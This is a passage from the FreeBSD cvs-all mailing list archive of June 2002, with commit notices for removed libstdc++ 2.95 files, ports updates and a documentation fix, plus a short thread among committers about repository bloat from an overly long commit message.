src/contrib/libstdc++.295/cstdarg (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cstddef (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cstdio (dead) 1.2 +0 -23 src/contrib/libstdc++.295/cstdlib (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cstdlibi.cc (dead) 1.2 +0 -96 src/contrib/libstdc++.295/cstring (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cstringi.cc (dead) 1.2 +0 -7 src/contrib/libstdc++.295/ctime (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cwchar (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cwctype (dead) 1.2 +0 -7 src/contrib/libstdc++.295/fstream (dead) 1.2 +0 -7 src/contrib/libstdc++.295/iomanip (dead) 1.2 +0 -15 src/contrib/libstdc++.295/iosfwd (dead) 1.2 +0 -7 src/contrib/libstdc++.295/iostream (dead) 1.2 +0 -132 src/contrib/libstdc++.295/sinst.cc (dead) 1.2 +0 -343 src/contrib/libstdc++.295/sstream (dead) 1.2 +0 -524 src/contrib/libstdc++.295/std/bastring.cc (dead) 1.2 +0 -620 src/contrib/libstdc++.295/std/bastring.h (dead) 1.2 +0 -273 src/contrib/libstdc++.295/std/complext.cc (dead) 1.2 +0 -400 src/contrib/libstdc++.295/std/complext.h (dead) 1.2 +0 -91 src/contrib/libstdc++.295/std/dcomplex.h (dead) 1.2 +0 -87 src/contrib/libstdc++.295/std/fcomplex.h (dead) 1.2 +0 -111 src/contrib/libstdc++.295/std/gslice.h (dead) 1.2 +0 -170 src/contrib/libstdc++.295/std/gslice_array.h (dead) 1.2 +0 -157 src/contrib/libstdc++.295/std/indirect_array.h (dead) 1.2 +0 -95 src/contrib/libstdc++.295/std/ldcomplex.h (dead) 1.2 +0 -154 src/contrib/libstdc++.295/std/mask_array.h (dead) 1.2 +0 -76 src/contrib/libstdc++.295/std/slice.h (dead) 1.2 +0 -156 src/contrib/libstdc++.295/std/slice_array.h (dead) 1.2 +0 -728 src/contrib/libstdc++.295/std/std_valarray.h (dead) 1.2 +0 -161 src/contrib/libstdc++.295/std/straits.h (dead) 1.2 +0 -346 src/contrib/libstdc++.295/std/valarray_array.h (dead) 1.2 +0 -130 src/contrib/libstdc++.295/std/valarray_array.tcc (dead) 1.2 +0 -1045 src/contrib/libstdc++.295/std/valarray_meta.h (dead) 1.2 +0 -101 src/contrib/libstdc++.295/stdexcept (dead) 1.2 +0 -21 src/contrib/libstdc++.295/stdexcepti.cc (dead) 1.2 +0 -15 src/contrib/libstdc++.295/stl.h (dead) 1.2 +0 -273 src/contrib/libstdc++.295/stl/ChangeLog (dead) 1.2 +0 -16 src/contrib/libstdc++.295/stl/README (dead) 1.2 +0 -114 src/contrib/libstdc++.295/stl/algo.h (dead) 1.2 +0 -71 src/contrib/libstdc++.295/stl/algobase.h (dead) 1.2 +0 -39 src/contrib/libstdc++.295/stl/algorithm (dead) 1.2 +0 -44 src/contrib/libstdc++.295/stl/alloc.h (dead) 1.2 +0 -1063 src/contrib/libstdc++.295/stl/bitset (dead) 1.2 +0 -51 src/contrib/libstdc++.295/stl/bvector.h (dead) 1.2 +0 -86 src/contrib/libstdc++.295/stl/defalloc.h (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/deque (dead) 1.2 +0 -42 src/contrib/libstdc++.295/stl/deque.h (dead) 1.2 +0 -118 src/contrib/libstdc++.295/stl/function.h (dead) 1.2 +0 -26 src/contrib/libstdc++.295/stl/functional (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/hash_map (dead) 1.2 +0 -48 src/contrib/libstdc++.295/stl/hash_map.h (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/hash_set (dead) 1.2 +0 -43 src/contrib/libstdc++.295/stl/hash_set.h (dead) 1.2 +0 -48 src/contrib/libstdc++.295/stl/hashtable.h (dead) 1.2 +0 -46 src/contrib/libstdc++.295/stl/heap.h (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/iterator (dead) 1.2 +0 -104 src/contrib/libstdc++.295/stl/iterator.h (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/list (dead) 1.2 +0 -42 src/contrib/libstdc++.295/stl/list.h (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/map (dead) 1.2 +0 -41 src/contrib/libstdc++.295/stl/map.h (dead) 1.2 +0 -89 src/contrib/libstdc++.295/stl/memory (dead) 1.2 +0 -41 src/contrib/libstdc++.295/stl/multimap.h (dead) 1.2 +0 -41 src/contrib/libstdc++.295/stl/multiset.h (dead) 1.2 +0 -42 src/contrib/libstdc++.295/stl/numeric (dead) 1.2 +0 -51 src/contrib/libstdc++.295/stl/pair.h (dead) 1.2 +0 -347 src/contrib/libstdc++.295/stl/pthread_alloc (dead) 1.2 +0 -31 src/contrib/libstdc++.295/stl/pthread_alloc.h (dead) 1.2 +0 -45 src/contrib/libstdc++.295/stl/queue (dead) 1.2 +0 -32 src/contrib/libstdc++.295/stl/rope (dead) 1.2 +0 -34 src/contrib/libstdc++.295/stl/rope.h (dead) 1.2 +0 -1537 src/contrib/libstdc++.295/stl/ropeimpl.h (dead) 1.2 +0 -40 src/contrib/libstdc++.295/stl/set (dead) 1.2 +0 -41 src/contrib/libstdc++.295/stl/set.h (dead) 1.2 +0 -28 src/contrib/libstdc++.295/stl/slist (dead) 1.2 +0 -30 src/contrib/libstdc++.295/stl/slist.h (dead) 1.2 +0 -41 src/contrib/libstdc++.295/stl/stack (dead) 1.2 +0 -46 src/contrib/libstdc++.295/stl/stack.h (dead) 1.2 +0 -2674 src/contrib/libstdc++.295/stl/stl_algo.h (dead) 1.2 +0 -442 src/contrib/libstdc++.295/stl/stl_algobase.h (dead) 1.2 +0 -698 src/contrib/libstdc++.295/stl/stl_alloc.h (dead) 1.2 +0 -616 src/contrib/libstdc++.295/stl/stl_bvector.h (dead) 1.2 +0 -250 src/contrib/libstdc++.295/stl/stl_config.h (dead) 1.2 +0 -78 src/contrib/libstdc++.295/stl/stl_construct.h (dead) 1.2 +0 -1335 src/contrib/libstdc++.295/stl/stl_deque.h (dead) 1.2 +0 -628 src/contrib/libstdc++.295/stl/stl_function.h (dead) 1.2 +0 -93 src/contrib/libstdc++.295/stl/stl_hash_fun.h (dead) 1.2 +0 -358 src/contrib/libstdc++.295/stl/stl_hash_map.h (dead) 1.2 +0 -343 src/contrib/libstdc++.295/stl/stl_hash_set.h (dead) 1.2 +0 -948 src/contrib/libstdc++.295/stl/stl_hashtable.h (dead) 1.2 +0 -226 src/contrib/libstdc++.295/stl/stl_heap.h (dead) 1.2 +0 -843 src/contrib/libstdc++.295/stl/stl_iterator.h (dead) 1.2 +0 -617 src/contrib/libstdc++.295/stl/stl_list.h (dead) 1.2 +0 -217 src/contrib/libstdc++.295/stl/stl_map.h (dead) 1.2 +0 -214 src/contrib/libstdc++.295/stl/stl_multimap.h (dead) 1.2 +0 -200 src/contrib/libstdc++.295/stl/stl_multiset.h (dead) 1.2 +0 -196 src/contrib/libstdc++.295/stl/stl_numeric.h (dead) 1.2 +0 -73 src/contrib/libstdc++.295/stl/stl_pair.h (dead) 1.2 +0 -134 src/contrib/libstdc++.295/stl/stl_queue.h (dead) 1.2 +0 -81 src/contrib/libstdc++.295/stl/stl_raw_storage_iter.h (dead) 1.2 +0 -62 src/contrib/libstdc++.295/stl/stl_relops.h (dead) 1.2 +0 -2112 src/contrib/libstdc++.295/stl/stl_rope.h (dead) 1.2 +0 -198 src/contrib/libstdc++.295/stl/stl_set.h (dead) 1.2 +0 -740 src/contrib/libstdc++.295/stl/stl_slist.h (dead) 1.2 +0 -76 src/contrib/libstdc++.295/stl/stl_stack.h (dead) 1.2 +0 -123 src/contrib/libstdc++.295/stl/stl_tempbuf.h (dead) 1.2 +0 -1099 src/contrib/libstdc++.295/stl/stl_tree.h (dead) 1.2 +0 -242 src/contrib/libstdc++.295/stl/stl_uninitialized.h (dead) 1.2 +0 -534 src/contrib/libstdc++.295/stl/stl_vector.h (dead) 1.2 +0 -58 src/contrib/libstdc++.295/stl/tempbuf.h (dead) 1.2 +0 -46 src/contrib/libstdc++.295/stl/tree.h (dead) 1.2 +0 -233 src/contrib/libstdc++.295/stl/type_traits.h (dead) 1.2 +0 -38 src/contrib/libstdc++.295/stl/utility (dead) 1.2 +0 -41 src/contrib/libstdc++.295/stl/vector (dead) 1.2 +0 -42 src/contrib/libstdc++.295/stl/vector.h (dead) 1.2 +0 -8 src/contrib/libstdc++.295/stlinst.cc (dead) 1.2 +0 -13 src/contrib/libstdc++.295/string (dead) 1.2 +0 -7 src/contrib/libstdc++.295/strstream (dead) 1.2 +0 -116 src/contrib/libstdc++.295/tests/ChangeLog (dead) 1.2 +0 -35 src/contrib/libstdc++.295/tests/Makefile.in (dead) 1.2 +0 -65 src/contrib/libstdc++.295/tests/configure.in (dead) 1.2 +0 -151 src/contrib/libstdc++.295/tests/tcomplex.cc (dead) 1.2 +0 -37 src/contrib/libstdc++.295/tests/tcomplex.exp (dead) 1.2 +0 -1 src/contrib/libstdc++.295/tests/tcomplex.inp (dead) 1.2 +0 -151 src/contrib/libstdc++.295/tests/tlist.cc (dead) 1.2 +0 -44 src/contrib/libstdc++.295/tests/tlist.exp (dead) 1.2 +0 -59 src/contrib/libstdc++.295/tests/tmap.cc (dead) 1.2 +0 -7 src/contrib/libstdc++.295/tests/tmap.exp (dead) 1.2 +0 -249 src/contrib/libstdc++.295/tests/tstring.cc (dead) 1.2 +0 -22 src/contrib/libstdc++.295/tests/tstring.exp (dead) 1.2 +0 -1 src/contrib/libstdc++.295/tests/tstring.inp (dead) 1.2 +0 -20 src/contrib/libstdc++.295/tests/tvector.cc (dead) 1.2 +0 -4 src/contrib/libstdc++.295/tests/tvector.exp (dead) 1.2 +0 -74 src/contrib/libstdc++.295/testsuite/ChangeLog (dead) 1.2 +0 -66 src/contrib/libstdc++.295/testsuite/Makefile.in (dead) 1.2 +0 -1 src/contrib/libstdc++.295/testsuite/config/default.exp (dead) 1.2 +0 -24 src/contrib/libstdc++.295/testsuite/configure.in (dead) 1.2 +0 -179 src/contrib/libstdc++.295/testsuite/lib/libstdc++.exp (dead) 1.2 +0 -34 src/contrib/libstdc++.295/testsuite/libstdc++.tests/test.exp (dead) 1.2 +0 -8 src/contrib/libstdc++.295/valarray (dead) 1.2 +0 -50 src/contrib/libstdc++.295/valarray.cc (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:17:11 2002 Delivered-To: cvs-all@freebsd.org Received: from leviathan.inethouston.net (leviathan.inethouston.net [66.64.12.249]) by hub.freebsd.org (Postfix) with ESMTP id 17C6F37B4EC; Tue, 18 Jun 2002 12:14:53 -0700 (PDT) Received: by leviathan.inethouston.net (Postfix, from userid 1001) id 2A7EE3198D8; Tue, 18 Jun 2002 14:14:51 -0500 (CDT) Date: Tue, 18 Jun 2002 14:14:51 -0500 From: "David W. Chapman Jr." To: Kris Kennaway Cc: "David E. O'Brien" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618191451.GD37018@leviathan.inethouston.net> Reply-To: "David W. Chapman Jr." Mail-Followup-To: Kris Kennaway , "David E. O'Brien" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020618115146.A82102@xor.obsecurity.org> X-Operating-System: FreeBSD 4.5-STABLE i386 User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 18, 2002 at 11:51:46AM -0700, Kris Kennaway wrote: > On Tue, Jun 18, 2002 at 11:33:52AM -0700, David E. O'Brien wrote: > > > obrien 2002/06/18 11:33:50 PDT > > > > Removed files: > > contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog > > [...] > > > Log: > > [... ASCII art deleted ...] > > Yay, another 680KB added to the repo for no particular reason. > Please, people! I could see how will's commit could be optomized, but how do you optomize this when the commit log was less than 10% of the message? -- David W. Chapman Jr. dwcjr@inethouston.net Raintree Network Services, Inc. dwcjr@freebsd.org FreeBSD Committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:19:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 52DB437B404; Tue, 18 Jun 2002 12:19:55 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJJtb85336; Tue, 18 Jun 2002 12:19:55 -0700 (PDT) (envelope-from marcus) Message-Id: <200206181919.g5IJJtb85336@freefall.freebsd.org> From: Joe Marcus Clarke Date: Tue, 18 Jun 2002 12:19:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/metacity-setup Makefile distinfo pkg-plist ports/x11-wm/metacity-setup/files patch-Makefile.in patch-src_main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/18 12:19:55 PDT Modified files: x11-wm/metacity-setup Makefile distinfo pkg-plist x11-wm/metacity-setup/files patch-Makefile.in Removed files: x11-wm/metacity-setup/files patch-src_main.c Log: Update to 0.5.1. Revision Changes Path 1.8 +1 -1 ports/x11-wm/metacity-setup/Makefile 1.6 +1 -1 ports/x11-wm/metacity-setup/distinfo 1.2 +17 -9 ports/x11-wm/metacity-setup/files/patch-Makefile.in 1.2 +0 -11 ports/x11-wm/metacity-setup/files/patch-src_main.c (dead) 1.4 +3 -0 ports/x11-wm/metacity-setup/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:23:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9081D37B40D; Tue, 18 Jun 2002 12:23:16 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJNG786157; Tue, 18 Jun 2002 12:23:16 -0700 (PDT) (envelope-from marcus) Message-Id: <200206181923.g5IJNG786157@freefall.freebsd.org> From: Joe Marcus Clarke Date: Tue, 18 Jun 2002 12:23:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/scrollkeeper Makefile distinfo pkg-install pkg-plist ports/textproc/scrollkeeper/files patch-Makefile.in patch-buildtools_separate.c patch-cl::src::install.c patch-cl_preinstall.c patch-cl_src_update.c patch-cl_templates_Makefile.in ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/18 12:23:16 PDT Modified files: textproc/scrollkeeper Makefile distinfo pkg-plist textproc/scrollkeeper/files patch-Makefile.in patch-scripts_scrollkeeper-config.in Added files: textproc/scrollkeeper pkg-install textproc/scrollkeeper/files patch-buildtools_separate.c patch-cl_preinstall.c patch-cl_src_update.c patch-cl_templates_Makefile.in patch-configure patch-extract_dtds_Makefile.in patch-libs_database.c patch-libs_scrollkeeper.h.in Removed files: textproc/scrollkeeper/files patch-cl::src::install.c patch-toc_src_toc-extract.c Log: Update to 0.3.9. Approved by: silence from the GNOME user group Revision Changes Path 1.10 +42 -16 ports/textproc/scrollkeeper/Makefile 1.4 +1 -1 ports/textproc/scrollkeeper/distinfo 1.5 +17 -11 ports/textproc/scrollkeeper/files/patch-Makefile.in 1.1 +10 -0 ports/textproc/scrollkeeper/files/patch-buildtools_separate.c (new) 1.4 +0 -8 ports/textproc/scrollkeeper/files/patch-cl::src::install.c (dead) 1.1 +20 -0 ports/textproc/scrollkeeper/files/patch-cl_preinstall.c (new) 1.3 +11 -0 ports/textproc/scrollkeeper/files/patch-cl_src_update.c (new) 1.1 +11 -0 ports/textproc/scrollkeeper/files/patch-cl_templates_Makefile.in (new) 1.3 +28 -0 ports/textproc/scrollkeeper/files/patch-configure (new) 1.1 +20 -0 ports/textproc/scrollkeeper/files/patch-extract_dtds_Makefile.in (new) 1.3 +12 -0 ports/textproc/scrollkeeper/files/patch-libs_database.c (new) 1.1 +11 -0 ports/textproc/scrollkeeper/files/patch-libs_scrollkeeper.h.in (new) 1.3 +2 -2 ports/textproc/scrollkeeper/files/patch-scripts_scrollkeeper-config.in 1.2 +0 -22 ports/textproc/scrollkeeper/files/patch-toc_src_toc-extract.c (dead) 1.1 +261 -0 ports/textproc/scrollkeeper/pkg-install (new) 1.7 +32 -177 ports/textproc/scrollkeeper/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:25:43 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id 90DE637B401; Tue, 18 Jun 2002 12:25:26 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 18D6466B95; Tue, 18 Jun 2002 12:25:26 -0700 (PDT) Date: Tue, 18 Jun 2002 12:25:25 -0700 From: Kris Kennaway To: Kris Kennaway , "David E. O'Brien" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618122525.A85448@xor.obsecurity.org> References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> <20020618191451.GD37018@leviathan.inethouston.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="X1bOJ3K7DJ5YkBrT" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020618191451.GD37018@leviathan.inethouston.net>; from dwcjr@inethouston.net on Tue, Jun 18, 2002 at 02:14:51PM -0500 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --X1bOJ3K7DJ5YkBrT Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 18, 2002 at 02:14:51PM -0500, David W. Chapman Jr. wrote: > On Tue, Jun 18, 2002 at 11:51:46AM -0700, Kris Kennaway wrote: > > On Tue, Jun 18, 2002 at 11:33:52AM -0700, David E. O'Brien wrote: > >=20 > > > obrien 2002/06/18 11:33:50 PDT > > >=20 > > > Removed files: > > > contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog=20 > >=20 > > [...] > >=20 > > > Log: > >=20 > > [... ASCII art deleted ...] > >=20 > > Yay, another 680KB added to the repo for no particular reason. > > Please, people! >=20 > I could see how will's commit could be optomized, but how do you=20 > optomize this when the commit log was less than 10% of the message? "Remove gcc.295, which is no longer used" 40 bytes instead of 688; a savings of 96% Kris --X1bOJ3K7DJ5YkBrT Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9D4klWry0BWjoQKURAryTAKCRvatPK2/p51QGAhbs3BbCUPW0iwCfU12+ yGXCBkTcq4vlU8aOWwQnxQA= =aUNz -----END PGP SIGNATURE----- --X1bOJ3K7DJ5YkBrT-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:29:36 2002 Delivered-To: cvs-all@freebsd.org Received: from leviathan.inethouston.net (leviathan.inethouston.net [66.64.12.249]) by hub.freebsd.org (Postfix) with ESMTP id 9CCAA37B405; Tue, 18 Jun 2002 12:29:12 -0700 (PDT) Received: by leviathan.inethouston.net (Postfix, from userid 1001) id 53B3B3198E4; Tue, 18 Jun 2002 14:29:15 -0500 (CDT) Date: Tue, 18 Jun 2002 14:29:15 -0500 From: "David W. Chapman Jr." To: Kris Kennaway Cc: "David E. O'Brien" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618192915.GG37018@leviathan.inethouston.net> Reply-To: "David W. Chapman Jr." Mail-Followup-To: Kris Kennaway , "David E. O'Brien" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> <20020618191451.GD37018@leviathan.inethouston.net> <20020618122525.A85448@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020618122525.A85448@xor.obsecurity.org> X-Operating-System: FreeBSD 4.5-STABLE i386 User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > I could see how will's commit could be optomized, but how do you > > optomize this when the commit log was less than 10% of the message? > > "Remove gcc.295, which is no longer used" > > 40 bytes instead of 688; a savings of 96% Ah, I thought all that extra stuff was cvs magic, but recalling now I understand, thanks for the clarification! -- David W. Chapman Jr. dwcjr@inethouston.net Raintree Network Services, Inc. dwcjr@freebsd.org FreeBSD Committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:29:43 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id A486637B415; Tue, 18 Jun 2002 12:29:15 -0700 (PDT) Received: from [128.113.24.47] (gilead.netel.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.12.1/8.12.1) with ESMTP id g5IJTDwQ113568; Tue, 18 Jun 2002 15:29:14 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <20020618115146.A82102@xor.obsecurity.org> References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> Date: Tue, 18 Jun 2002 15:29:13 -0400 To: Kris Kennaway , "David E. O'Brien" From: Garance A Drosihn Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.3 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 11:51 AM -0700 6/18/02, Kris Kennaway wrote: >On Tue, Jun 18, 2002 at 11:33:52AM -0700, David E. O'Brien wrote: > >> obrien 2002/06/18 11:33:50 PDT >> >> Removed files: >> contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog > >[...] > >> Log: > >[... ASCII art deleted ...] > >Yay, another 680KB added to the repo for no particular reason. >Please, people! This would have been a perfect application for the Aside: ..blah blah.. ..blah blah.. section that I had been asking for in commit messages... :-) -- Garance Alistair Drosehn = gad@gilead.netel.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:32:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5C48437B405; Tue, 18 Jun 2002 12:32:53 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJWr087573; Tue, 18 Jun 2002 12:32:53 -0700 (PDT) (envelope-from blackend) Message-Id: <200206181932.g5IJWr087573@freefall.freebsd.org> From: Marc Fonvieille Date: Tue, 18 Jun 2002 12:32:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/filtering-bridges article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/18 12:32:53 PDT Modified files: en_US.ISO8859-1/articles/filtering-bridges article.sgml Log: Use of appropriate tags for quotation marks, removing a contraction PR: docs/38951 Submitted by: Marc Fonvieille Approved by: keramida Revision Changes Path 1.11 +13 -13 doc/en_US.ISO8859-1/articles/filtering-bridges/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:35:18 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id AC11137B406; Tue, 18 Jun 2002 12:35:00 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5IJZ0P8005428; Tue, 18 Jun 2002 12:35:00 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5IJZ0mZ005427; Tue, 18 Jun 2002 12:35:00 -0700 (PDT) Date: Tue, 18 Jun 2002 12:35:00 -0700 From: "David O'Brien" To: Kris Kennaway Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618123500.A2849@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020618115146.A82102@xor.obsecurity.org>; from kris@obsecurity.org on Tue, Jun 18, 2002 at 11:51:46AM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 18, 2002 at 11:51:46AM -0700, Kris Kennaway wrote: > On Tue, Jun 18, 2002 at 11:33:52AM -0700, David E. O'Brien wrote: > > > obrien 2002/06/18 11:33:50 PDT > > > > Removed files: > > contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog > > [...] > > > Log: > > [... ASCII art deleted ...] > > Yay, another 680KB added to the repo for no particular reason. My commit message is about 675 bytes "too long" -- 531KB, not 680KB. > Please, people! 1. you've forgotten *.295 will totally disappear soon (as in not even in the Attic, totally gone as if it never, ever existed). 2. in general people seem to not care about repo bloat anymore -- not when disk sizes are what they are. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:37: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org 